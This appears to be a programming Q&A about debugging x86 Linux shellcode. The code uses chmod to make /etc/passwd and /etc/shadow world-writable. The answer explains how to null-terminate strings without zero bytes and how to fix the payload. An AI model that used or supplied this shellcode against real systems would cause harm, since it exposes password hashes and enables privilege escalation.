为什么该程序集不起作用？

Question

section .text
    global _start
_start:
    jmp short init

    main2:
    mov al, 15
    pop ebx
    mov ecx, 0x111111ff
    shl ecx, 0x14
    shr ecx, 0x14
    int 0x80

    xor ebx, ebx
    mul ebx
    mov al, 1
    int 0x80

    main1:
    mov al, 15
    pop ebx
    mov ecx, 0x111111ff
    shl ecx, 0x14
    shr ecx, 0x14
    int 0x80

    xor ebx, ebx
    mul ebx
    mov ecx, eax

    call main2
    db '/etc/shadow'

    init:
    call main1
    db '/etc/passwd'

This manages to set /etc/passwd to 777, but /etc/shadow remains untouched. The execution flow does go through main2, but it does not do anything to /etc/shadow. Replacing main2's functionality with this:

EAX: 4 ; sys_write
EBX: 1 ; stdout
ECX: '/etc/shadow' ; popped from stack with "pop ecx", holds "/etc/shadow"
EDX: 11
int 0x80

prints out "/etc/shadow" properly onto the terminal.

Finally, an "info reg" in GDB shows that the value of ECX before the interrupt as "0x1ff", which is equivalent to "chmod 777". So why doesn't this work?

EDIT: So the code doesn't work due to there being junk at the end of '/etc/shadow'. So now my question is, why is there junk at the end and how should I get this to work.

Answer 1

why is there junk at the end

Because you put it there. The assembler just assembles bytes into the output file, so it's up to you to put the right bytes in the right order.

and how should I get this to work.

Jester already answered this in a comment: "This is shellcode where 0 bytes are not normally allowed. So, the string should be zero terminated at runtime."

So leave a byte after the end of /etc/shadow for you to overwrite, and at run-time overwrite it with a zero. (zero a register with xor eax,eax or something).

Note that if you assemble and run your code as a stand-alone executable, the strings will be in the read-only text segment. You could put them in section .data to simulate what will happen when you inject this into the stack of another process. I forget which segments are non-executable by default in Linux processes.

The other way to go about this is to push the string onto the stack. Since you're using 32-bit code, PUSH imm32 should be useful. PUSH imm8 can give you zero-padding without a zero in the instruction.

Like maybe

push  'w'         ; imm8  -> w 0 0 0
push  'hado'      ; imm32 -> h a d o
push  'tc/s' 
push  '///e'
mov   ebx, esp    ; ebp = pointer to '///etc/shadow'
;lea ebx, [esp+2]   ; skip the leading "//", just to show that this technique works even if you can't pad your string to fill whole chunks of 4B.

In 64-bit code, push imm32 leave 4 bytes of zeros (or ones, since the imm32 is sign-extended to 64-bit). You could fill those with a mov dword [rsp+4], imm32 , or push word imm16 to push 2 bytes at a time. (leaving the stack misaligned.) x86-64 machine code can't encode a 32-bit operand-size push.

---

Other bugs in your code:

• mov al, 15 doesn't set the rest of eax. It depends on the upper bytes being zero for getting the right system call number.

  Try push 15 / pop eax . Remember that execution speed doesn't matter when writing shellcode, so you can use idioms that are nasty and slow. Some of the same things that are good for code-golf / code-size optimization are good here, too, since zero bytes are usually wasted padding to be avoided. I have a few x86 machine code answers over on codegolf.SE.